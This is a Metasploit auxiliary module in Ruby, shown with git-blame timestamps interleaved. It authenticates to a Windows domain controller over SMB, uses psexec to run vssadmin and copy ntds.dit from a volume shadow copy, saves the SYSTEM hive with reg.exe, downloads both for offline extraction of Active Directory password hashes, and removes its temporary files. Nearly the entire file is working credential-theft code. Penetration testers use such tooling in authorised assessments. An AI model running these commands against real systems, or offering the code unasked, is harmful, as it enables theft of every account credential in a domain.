2013-03-11 01:07:04 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-03-11 01:07:04 +00:00
|
|
|
##
|
|
|
|
|
2012-12-14 14:53:22 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Exploit mixins should be called first
|
|
|
|
include Msf::Exploit::Remote::SMB::Psexec
|
|
|
|
include Msf::Auxiliary::Report
|
2013-01-07 18:49:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Aliases for common classes
|
|
|
|
SIMPLE = Rex::Proto::SMB::SimpleClient
|
|
|
|
XCEPT= Rex::Proto::SMB::Exceptions
|
|
|
|
CONST= Rex::Proto::SMB::Constants
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'PsExec NTDS.dit And SYSTEM Hive Download Utility',
|
|
|
|
'Description'=> %q{
|
|
|
|
This module authenticates to an Active Directory Domain Controller and creates
|
|
|
|
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the
|
|
|
|
ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM
|
|
|
|
hive copy can be used in combination with other tools for offline extraction of AD
|
|
|
|
password hashes. All of this is done without uploading a single binary to the
|
|
|
|
target host.
|
|
|
|
},
|
|
|
|
'Author' => [
|
|
|
|
'Royce Davis <rdavis[at]accuvant.com>' # @R3dy__
|
|
|
|
],
|
|
|
|
'License'=> MSF_LICENSE,
|
|
|
|
'References' => [
|
|
|
|
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
|
|
|
|
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ]
|
|
|
|
]
|
|
|
|
))
|
2013-01-07 18:49:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options([
|
|
|
|
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
|
|
|
|
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
|
|
|
|
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
|
|
|
|
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
|
|
|
|
], self.class)
|
2013-01-07 18:49:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# This is the main control method
|
|
|
|
def run
|
|
|
|
# Initialize some variables
|
|
|
|
text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
|
|
|
|
bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
|
|
|
|
createvsc = "vssadmin create shadow /For=%SYSTEMDRIVE%"
|
|
|
|
@ip = datastore['RHOST']
|
|
|
|
@smbshare = datastore['SMBSHARE']
|
|
|
|
# Try and connect
|
|
|
|
if connect
|
|
|
|
#Try and authenticate with given credentials
|
|
|
|
begin
|
|
|
|
smb_login
|
|
|
|
rescue StandardError => autherror
|
|
|
|
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
# If a VSC was specified then don't try and create one
|
|
|
|
if datastore['VSCPATH'].length > 0
|
|
|
|
print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
|
|
|
|
vscpath = datastore['VSCPATH']
|
|
|
|
else
|
|
|
|
unless datastore['CREATE_NEW_VSC'] == true
|
|
|
|
vscpath = check_vss(text, bat)
|
|
|
|
end
|
|
|
|
unless vscpath
|
|
|
|
vscpath = make_volume_shadow_copy(createvsc, text, bat)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if vscpath
|
|
|
|
if copy_ntds(vscpath, text) and copy_sys_hive
|
|
|
|
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
|
|
|
|
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
|
|
|
|
else
|
|
|
|
print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Thids method will check if a Volume Shadow Copy already exists and use that rather
|
|
|
|
# then creating a new one
|
|
|
|
def check_vss(text, bat)
|
|
|
|
begin
|
|
|
|
print_status("#{peer} - Checking if a Volume Shadow Copy exists already.")
|
|
|
|
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
|
|
|
|
command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
|
|
|
|
result = psexec(command)
|
|
|
|
data = smb_read_file(datastore['SMBSHARE'], @ip, text)
|
|
|
|
vscs = []
|
|
|
|
data.each_line { |line| vscs << line if line.include?("GLOBALROOT") }
|
|
|
|
if vscs.empty?
|
|
|
|
print_status("#{peer} - No VSC Found.")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp
|
|
|
|
print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}")
|
|
|
|
return vscpath
|
|
|
|
rescue StandardError => vsscheckerror
|
|
|
|
print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Create a Volume Shadow Copy on the target host
|
|
|
|
def make_volume_shadow_copy(createvsc, text, bat)
|
|
|
|
begin
|
|
|
|
#Try to create the shadow copy
|
|
|
|
command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
|
|
|
|
print_status("#{peer} - Creating Volume Shadow Copy")
|
|
|
|
out = psexec(command)
|
|
|
|
#Get path to Volume Shadow Copy
|
|
|
|
vscpath = get_vscpath(text)
|
|
|
|
rescue StandardError => vscerror
|
|
|
|
print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
if vscpath
|
|
|
|
print_good("#{peer} - Volume Shadow Copy created on #{vscpath}")
|
|
|
|
return vscpath
|
|
|
|
else
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
|
|
|
|
def copy_ntds(vscpath, text)
|
|
|
|
begin
|
|
|
|
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
|
|
|
|
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
|
|
|
|
run = psexec(command)
|
|
|
|
if !check_ntds(text)
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
return true
|
|
|
|
rescue StandardError => ntdscopyerror
|
|
|
|
print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Checks if ntds.dit was copied to the Windows Temp directory
|
|
|
|
def check_ntds(text)
|
|
|
|
print_status("#{peer} - Checking if NTDS.dit was copied.")
|
|
|
|
check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}"
|
|
|
|
run = psexec(check)
|
|
|
|
output = smb_read_file(@smbshare, @ip, text)
|
|
|
|
if output.include?("ntds")
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
return false
|
|
|
|
end
|
2013-01-22 15:36:43 +00:00
|
|
|
|
2013-01-07 18:49:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Copies the SYSTEM hive file to the Temp directory on the target host
|
|
|
|
def copy_sys_hive
|
|
|
|
begin
|
|
|
|
# Try to crate the sys hive copy
|
|
|
|
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
|
|
|
|
return psexec(command)
|
|
|
|
rescue StandardError => hiveerror
|
|
|
|
print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Download the ntds.dit copy to your attacking machine
|
|
|
|
def download_ntds(file)
|
|
|
|
print_status("#{peer} - Downloading ntds.dit file")
|
|
|
|
begin
|
|
|
|
# Try to download ntds.dit
|
|
|
|
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
remotefile = simple.open("#{file}", 'rob')
|
|
|
|
data = remotefile.read
|
|
|
|
remotefile.close
|
|
|
|
ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
|
|
|
|
print_good("#{peer} - ntds.dit stored at #{ntds_path}")
|
|
|
|
rescue StandardError => ntdsdownloaderror
|
|
|
|
print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
|
|
|
|
return ntdsdownloaderror
|
|
|
|
end
|
|
|
|
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Download the SYSTEM hive copy to your attacking machine
|
|
|
|
def download_sys_hive(file)
|
|
|
|
print_status("#{peer} - Downloading SYSTEM hive file")
|
|
|
|
begin
|
|
|
|
# Try to download SYSTEM hive
|
|
|
|
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
remotefile = simple.open("#{file}", 'rob')
|
|
|
|
data = remotefile.read
|
|
|
|
remotefile.close
|
|
|
|
hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive")
|
|
|
|
print_good("#{peer} - SYSTEM hive stored at #{hive_path}")
|
|
|
|
rescue StandardError => sysdownloaderror
|
|
|
|
print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}")
|
|
|
|
return sysdownloaderror
|
|
|
|
end
|
|
|
|
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
end
|
2013-01-07 18:49:58 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Gets the path to the Volume Shadow Copy
|
|
|
|
def get_vscpath(file)
|
|
|
|
begin
|
|
|
|
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
|
|
|
|
vsc = ""
|
|
|
|
output = smb_read_file(@smbshare, @ip, file)
|
|
|
|
output.each_line do |line|
|
|
|
|
vsc += line if line.include?("GLOBALROOT")
|
|
|
|
end
|
|
|
|
return prepath + vsc.split("ShadowCopy")[1].chomp
|
|
|
|
rescue StandardError => vscpath_error
|
|
|
|
print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
2012-12-14 14:53:22 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Removes files created during execution.
|
|
|
|
def cleanup_after(*files)
|
|
|
|
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
print_status("#{peer} - Executing cleanup...")
|
|
|
|
files.each do |file|
|
|
|
|
begin
|
|
|
|
if smb_file_exist?(file)
|
|
|
|
smb_file_rm(file)
|
|
|
|
end
|
|
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
|
|
|
print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
left = files.collect{ |f| smb_file_exist?(f) }
|
|
|
|
if left.any?
|
|
|
|
print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
|
|
|
else
|
|
|
|
print_status("#{peer} - Cleanup was successful")
|
|
|
|
end
|
|
|
|
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
|
|
|
end
|
2013-01-22 15:36:43 +00:00
|
|
|
|
2012-12-14 14:53:22 +00:00
|
|
|
end
|